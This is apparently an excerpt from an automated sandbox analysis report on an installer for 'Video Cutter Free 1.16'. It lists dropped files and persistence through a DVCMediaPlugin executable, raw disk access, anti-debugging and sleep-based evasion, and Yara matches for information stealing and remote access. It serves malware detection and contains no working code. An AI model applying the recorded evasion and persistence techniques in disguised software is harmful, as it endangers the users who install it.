                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\LTDIS13n.dll (copy)
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | File created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\is-LRS1N.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcp71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\sqlite3.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-2IP8E.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-JSB39.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-19B75.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-J7MTP.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\ltkrn13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | File created: C:\ProgramData\DVCMediaPlugin\sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-LDIKA.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | File created: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | File created: C:\ProgramData\DVCMediaPlugin\sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | File created: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_0099E652
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_00402520 StartServiceCtrlDispatcherA, 5_2_00402520
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus, 1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00424194 IsIconic,SetActiveWindow, 1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00483420 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00483420
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00417598 IsIconic,GetCapture, 1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00417CCE IsIconic,SetWindowPos, 1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 1_2_0041F118
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 5_2_00401B4B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 5_2_0099E756
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-IBF1C.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\LTDIS13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-PTGV1.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\is-LRS1N.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcp71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-2IP8E.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-JSB39.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-19B75.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-J7MTP.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\ltkrn13n.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-LDIKA.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-F6LGR.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5548
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | API coverage: 4.9 %
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 2748 | Thread sleep count: 81 > 30
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 2748 | Thread sleep time: -162000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 6112 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe TID: 6112 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00474DFC FindFirstFileA,FindNextFileA,FindClose, 1_2_00474DFC
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004625C4 FindFirstFileA,FindNextFileA,FindClose, 1_2_004625C4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00463B50 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463B50
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00497C14 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_00497C14
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00463FCC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463FCC
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B30
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Thread delayed: delay time: 60000
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Thread delayed: delay time: 60000
                    Source: videocutterfree.exe, 00000005.00000002.3874287343.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWI|O_
                    Source: videocutterfree.exe, 00000005.00000002.3874926537.0000000003573000.00000004.00000020.00020000.00000000.sdmp, videocutterfree.exe, 00000005.00000002.3874287343.0000000000B18000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | API call chain: ExitProcess graph end node graph_0-6680
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | API call chain: ExitProcess graph end node graph_5-61739
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009A82EE IsDebuggerPresent, 5_2_009A82EE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009AEF6E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 5_2_009AEF6E
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_00995C76 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection, 5_2_00995C76
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009A82D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_009A82D8
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00478024 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 1_2_00478024
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_cutter_free_12102
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_009A6E1D cpuid 5_2_009A6E1D
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: GetLocaleInfoA, 0_2_0040520C
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: GetLocaleInfoA, 0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: GetLocaleInfoA, 1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: GetLocaleInfoA, 1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00458418 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 1_2_00458418
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045559C GetUserNameA, 1_2_0045559C
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00405CF4 GetVersionExA, 0_2_00405CF4

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: videocutterfree.exe PID: 6460, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000005.00000002.3874104942.0000000000991000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.3874746180.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: videocutterfree.exe PID: 6460, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value, 5_2_609660FA
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave, 5_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave, 5_2_60963143
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 5_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free, 5_2_6096923E
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset, 5_2_6096A38C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free, 5_2_6096748C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave, 5_2_609254B1
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 5_2_6094B407
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6090F435 sqlite3_bind_parameter_index, 5_2_6090F435
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16, 5_2_609255D4
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609255FF sqlite3_bind_text, 5_2_609255FF
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free, 5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove, 5_2_6094B54C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave, 5_2_60925686
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free, 5_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64, 5_2_609256E5
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step, 5_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6092562A sqlite3_bind_blob, 5_2_6092562A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave, 5_2_60925655
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 5_2_6094C64A
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free, 5_2_609687A7
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 5_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave, 5_2_6092570B
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset, 5_2_6095F772
